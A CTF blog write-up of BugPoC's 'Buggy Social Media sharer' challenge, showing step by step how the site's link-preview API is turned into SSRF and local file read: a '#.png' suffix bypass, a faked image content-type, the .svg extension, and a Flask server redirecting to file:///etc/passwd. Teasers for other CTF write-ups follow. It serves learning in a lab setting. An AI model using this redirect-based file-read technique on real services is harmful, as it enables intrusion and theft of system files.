BugPoC's LFI challenge writeup




Buggy Social Media sharer

Given a website : http://social.buggywebsite.com/
The Goal of the challenge is to achieve LFI and steal /etc/passwd
It's a striaght forwarding challenge, by going through the Js, we can see URL card generating functionality
function processUrl(e) {
    requestTime = Date.now(), url = "https://api.buggywebsite.com/website-preview";
    var t = new XMLHttpRequest;
    t.onreadystatechange = function() {
        4 == t.readyState && 200 == t.status ? (response = JSON.parse(t.responseText), populateWebsitePreview(response)) : 4 == t.readyState && 200 != t.status && (console.log(t.responseText), document.getElementById("website-preview").style.display = "none")
    }, t.open("POST", url, !0), t.setRequestHeader("Content-Type", "application/json; charset=UTF-8"), t.setRequestHeader("Accept", "application/json"), data = {
        url: e,
        requestTime: requestTime
    }, t.send(JSON.stringify(data))
}

we can send a link to api server for website priview, which might become a SSRF.
For testing used ngrok, Flask server.
For sending the link to api sever, and checking the result. 
from requests import *
import json

def send_to_server(url)
	data = {'url': url, 'requestTime': 1600626399730}
	link = "https://api.buggywebsite.com/website-preview"
	res = post(link, json=data).json()
	print(json.dumps(res, indent = 4)) 

url = "https://83f09872705f.ngrok.io/" #url for web preview
send_to_server(url)
By Giving a normal URL , with empty content. 
{
    "title": "",
    "description": "",
    "requestTime": 1600626399730,
    "domain": "83f09872705f.ngrok.io"
}
It's Sending the og data in reverse. Need to check how it deals with.
Changed the HTMl content of server side with ogdata
<html>
<head>
	<meta property="og:title" content="Test title">
	<meta property="og:description" content="Test content">
	<meta property="og:image" content="https://www.gettyimages.in/gi-resources/images/500px/983794168.jpg">
	<title>Test title456</title>
</head>
<body></body>
</html>
Which results in 
{
    "title": "Test title",
    "description": "Test content",
    "requestTime": 1600626399730,
    "domain": "83f09872705f.ngrok.io",
    "image": {
        "content": "/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP........",
        "encoded": true,
        "mimetype": "image/jpeg"
    }
}
The API server is fetching the url in og:image, sending it's content (base64 encoded).
Now it makes sense, we some how manage to expliot this funtionality to return `/etc/passwd` content.


Observation - 1

Placed `og:image` = `file:///etc/passwd`. 
{
    "title": "Test title",
    "description": "Test content",
    "requestTime": 1600626399730,
    "domain": "83f09872705f.ngrok.io",
    "image": {
        "error": "Invalid Image URL"
    }
}
The URL must `http://` or `https://`.

Observation - 2

Placed og:image = https://OUR-SERVER/image. Still the Invalid URL error. placed a .png at the end. worked. We need to place an image extension at the end on URL. We can use #.png to overcome the check.

Observation - 3

Testing with custom image route. 
@app.route('/image',methods = ['GET'])  
def image():
	return "Nice"

@app.route("/meta-data")
def meta_data():
	return '''
<html>
<head>
	<meta property="og:title" content="Test title">
	<meta property="og:description" content="Test content">
	<meta property="og:image" content="https://%s/image#.png">
	<title>Test title456</title>
</head>
<body></body>
</html>
'''%DOMAIN
Which results in 
    "image": {
        "error": "Image Failed HEAD Test"
    }
In the server log found "HEAD /image HTTP/1.1" 200 -. The server is checking the headers using HEAD method, may be checking content type header.


Observation - 4

So added the content-type: image/png in response headers. 
@app.route('/image',methods = ['GET'])  
def image():
	resp = Response("Nice")
	resp.headers['content-type'] = 'image/png'
	return resp
Which results in 
    "image": {
        "error": "Unable to Process Image"
    }
The Server log 
"GET /meta-data HTTP/1.1" 200 -
"HEAD /image HTTP/1.1" 302 -
"GET /image HTTP/1.1" 200 -
HEAD check succeded, then fetched the image (GET), Processed it somehow based on image extension.
We need to bypass it, As is based on image extension. We can check all image extenstions.


Observation - 5

By gone through checking extesions, .svg worked for me.
    "image": {
        "content": "Nice",
        "encoded": false,
        "mimetype": "image/svg+xml"
    }
Now we achived a proper SSRF, we can fetch any URL from server side.

Observation - 6

After SSRF, checked all possibilities like cloud meta data urls, any ports on localhost.
But no use
Then checked if an redirect is possible for fetching the image. 
@app.route('/landing',methods = ['GET'])
def landing():
	return "Redirection Worked"

@app.route('/image',methods = ['GET'])  
def image():
	resp = Response("Nice", 302)
	resp.headers['content-type'] = 'image/png'
	resp.headers['location'] = '/landing'
	return resp
Which results in 
    "image": {
        "content": "Redirection Worked",
        "encoded": false,
        "mimetype": "image/svg+xml"
    }


Finally

Tried to redirect it to file:///etc/passwd. It worked. :)

Payload

Server script :
Client script

Thanks for reading !...

Comments

Post a Comment

Popular posts from this blog

Square CTF 2019 Writeup's

Image
   [*]-challenges    [+] (one   - 100 pts) Talk to me    [+] (two   - 700 pts) Aesni    [+] (three - 150 pts) Decode me    [+] (five  - 200 pts) Inwasmble    [+] (seven - 600 pts) Lockbox    [+] (nine  - 700 pts) Sudo make me a flag Our Team Invaders ended up at 19th position With points 3450 points Talk to me A service running at `talk-to-me-dd00922915bfc3f1.squarectf.com:5678` $ nc talk-to-me-dd00922915bfc3f1.squarectf.com 5678 Hello! aaaaaaaaaaaa Sorry, I can't understand you. Saying Hello! and asking for input(aaaaaaaaaaaa) Then returning a message After some trails, Two errors meant a lot (for 1 and ') $ nc talk-to-me-dd00922915bfc3f1.squarectf.com 5678 Hello! 1 undefined method `match' for 1:Integer /talk_to_me.rb:16:in `receive_data' /var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine' /var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run' /talk_to_me.rb:31:in ` '
Read more

K3RN3L CTF 2021 Rev - `Recurso & Rasm ` writeups

Image
This is a write-up for Reverse engineering challenges in K3RN3LCTF 2021 based on VM Concept using Recurso Language [*]-challenges     [+] (Rev - 500 pts) Recurso ( First Blood )     [+] (Rev - 500 pts) Rasm (After CTF) Our Team zh3ro ended up at 9 th position in `K3RN3LCTF - 2021`. These Reverse engineering challs are interesting -> Both are based on one vm only (Recurso), different compiled scripts . (leFlag.recc , rasm.recc) Recurso Given a Recurso Execuatable which can compile, run recurso sccrips. And a leFlag.recc (a recurso compiled file) containing a flag checking logic, can be run by given Recurso executable. The Goal of the challenge is to get the flag checking logic in leFlag.recc and steal flag Decompile and Analyse -> Recurso First we have to get to know about how the Recurso is running this byte code in order to get the logic of le
Read more

InCTF 2019 writeup's

[+] (Rev - 100 pts) cliche_crackme [+] (Web - 856 pts) s3cur3-r3v Our Team Invaders end up at 9th position With points 4375 points cliche_crackme (Rev) By dissambling the exectuable; It is just encrypting our input Checking with data string It is doing simply data = b'\xd7\xcc\xdd\xcf\xe4\xbd\xd1\x9d\xdd\xdc\xc8\xd1\xce\x9a\x9a\xc8\xd5\x99\xdd\xc8\x99\xcf\xc8\xe0\x99\xdb\xd4\xc8\xe0\x9d\xdc\xc8\xd2\xdd\xa8\xe6\xd1\xe2\xd4\xe9\xc2\xd6\xa2\xe2\xe1\xcd\xd6\xd3\x9f\x9f\xcd\xda\x9e\xe2\xcd\x9e\xd4\xcd\xe5\x9e\xe0\xd9\xcd\xe5\xa2\xe1\xcd\xd7\xe2\xad\xeb\xd7\xc9\xde\xb7\xcb\x97\xd7\xd6\xc2\xcb\xc8\x94\x94\xc2\xcf\x93\xd7\xc2\x93\xc9\xc2\xda\x93\xd5\xce\xc2\xda\x97\xd6\xc2\xcc\xd7\xa2\xe0\xda\xef\xc8\xdc\xa8\xe8\xe7\xd3\xdc\xd9\xa5\xa5\xd3\xe0\xa4\xe8\xd3\xa4\xda\xd3\xeb\xa4\xe6\xdf\xd3\xeb\xa8\xe7\xd3\xdd\xe8\xb3\xf1\xe1\xba\xce\x9a\xda\xd9\xc5\xce\xcb\x97\x97\xc5\xd2\x96\xda\xc5\x96\xcc\xc5\xdd\x96\xd8\xd1\xc5\xdd\x9a\xd9\xc5\xcf\xda\xa5
Read more